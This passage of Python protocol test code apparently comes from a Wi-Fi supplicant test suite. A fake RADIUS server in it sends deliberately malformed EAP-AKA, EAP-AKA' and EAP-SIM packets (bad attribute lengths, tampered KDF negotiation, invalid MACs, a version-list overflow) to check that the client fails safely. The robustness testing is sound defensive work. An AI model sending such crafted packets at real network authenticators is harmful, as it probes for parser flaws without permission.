if ctx['num'] == idx:
logger.info("Test: Invalid AT_SELECTED_VERSION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_SELECTED_VERSION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER_TOO_SMALL")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER_TOO_SMALL, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NONCE_S")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_S, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CLIENT_ERROR_CODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CLIENT_ERROR_CODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_IV length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IV, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_ENCR_DATA length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ENCR_DATA, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_PSEUDONYM")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_PSEUDONYM, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_REAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_REAUTH_ID, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 6, 0xffff, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTS length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CHECKCODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RESULT_IND length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RESULT_IND, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_BIDDING length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_BIDDING, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 49):
eap = "AKA AKA'" if i == 11 else "AKA"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap=eap, identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0, 15 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
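# EAP-AKA' (RFC 5448) adds KDF negotiation on top of EAP-AKA: the server
# offers one or more AT_KDF attributes in preference order plus
# AT_KDF_INPUT (the network name), and when the peer counter-proposes,
# the server must re-send the Challenge with the selected KDF duplicated
# at the head of the original list. The cases below poke at that
# negotiation.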
def test_eap_proto_aka_prime(dev, apdev):
"""EAP-AKA' protocol tests"""
def aka_prime_handler(ctx, req):
logger.info("aka_prime_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
dev[0].note("Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA_PRIME)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
dev[0].note("Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with empty AT_KDF_INPUT")
dev[0].note("Challenge with empty AT_KDF_INPUT")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with AT_KDF_INPUT")
dev[0].note("Test: Challenge with AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with duplicated KDF")
dev[0].note("Challenge with duplicated KDF")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with incorrect KDF selected")
dev[0].note("Challenge with incorrect KDF selected")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with selected KDF not duplicated")
dev[0].note("Challenge with selected KDF not duplicated")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with selected KDF duplicated (missing MAC, RAND, AUTN)")
dev[0].note("Challenge with selected KDF duplicated (missing MAC, RAND, AUTN)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple unsupported KDF proposals")
dev[0].note("Challenge with multiple unsupported KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 2 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with invalid MAC, RAND, AUTN values)")
dev[0].note("Challenge with invalid MAC, RAND, AUTN values)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_AUTN, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - AMF separation bit not set)")
dev[0].note("Challenge - AMF separation bit not set)")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 9, 10,
0x2fda8ef7, 0xbba518cc)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - Invalid MAC")
dev[0].note("Challenge - Invalid MAC")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
0xd1f90322, 0x40514cb4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - Valid MAC")
dev[0].note("Challenge - Valid MAC")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0,
0xf4a3c1d3, 0x7c901401, 0x34bd8b01, 0x6f7fa32f,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
0xd1f90322, 0x40514cb4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_KDF_INPUT length")
dev[0].note("Invalid AT_KDF_INPUT length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0xffff, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_KDF length")
dev[0].note("Invalid AT_KDF length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with large number of KDF proposals")
dev[0].note("Challenge with large number of KDF proposals")
return struct.pack(">BBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 12 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 253,
EAP_SIM_AT_KDF, 1, 252,
EAP_SIM_AT_KDF, 1, 251,
EAP_SIM_AT_KDF, 1, 250,
EAP_SIM_AT_KDF, 1, 249,
EAP_SIM_AT_KDF, 1, 248,
EAP_SIM_AT_KDF, 1, 247,
EAP_SIM_AT_KDF, 1, 246,
EAP_SIM_AT_KDF, 1, 245,
EAP_SIM_AT_KDF, 1, 244)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 2 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with an extra KDF appended")
dev[0].note("Challenge with an extra KDF appended")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 2 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with a modified KDF")
dev[0].note("Challenge with a modified KDF")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 0,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_prime_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 18):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
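# EAP-SIM (RFC 4186) begins with a Start round in which the server's
# AT_VERSION_LIST and the peer's selected version are later mixed into
# the master key derivation, which is why the malformed version-list
# cases below must abort the exchange.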
def test_eap_proto_sim(dev, apdev):
"""EAP-SIM protocol tests"""
def sim_handler(ctx, req):
logger.info("sim_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_SIM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_AUTN")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_AUTN, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_VERSION_LIST overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_AUTS")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
